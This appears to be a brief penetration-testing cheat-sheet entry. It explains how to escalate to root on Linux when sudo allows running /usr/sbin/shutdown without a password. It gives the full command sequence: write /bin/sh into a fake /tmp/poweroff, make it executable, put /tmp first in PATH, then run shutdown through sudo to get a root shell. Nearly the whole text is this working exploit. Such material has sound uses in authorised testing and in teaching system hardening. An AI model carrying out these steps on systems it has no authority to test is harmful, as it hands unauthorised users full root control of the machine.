Sudo Shutdown, Poweroff Privilege Escalation
Last modified: 2023-02-05
Sudo shutdown command might be vulnerable to privilege escalation (PrivEsc).
sudo -l (ALL) NOPASS: /usr/sbin/shutdown
If we can execute "shutdown" command as root, we can gain access to privileges by overwriting the path of "poweroff".
First create /tmp/poweroff binary which invoke a shell.
echo /bin/sh > /tmp/poweroff # or echo /bin/bash > /tmp/poweroff
Then change permissions of the file and add "/tmp" folder to PATH.
chmod +x /tmp/poweroff export PATH=/tmp:$PATH
Now execute "shutdown" as root.
# Some SUID command sudo /usr/sbin/shutdown # Then you are root user root>
/tmp/poweroff is executed and spawn a root shell.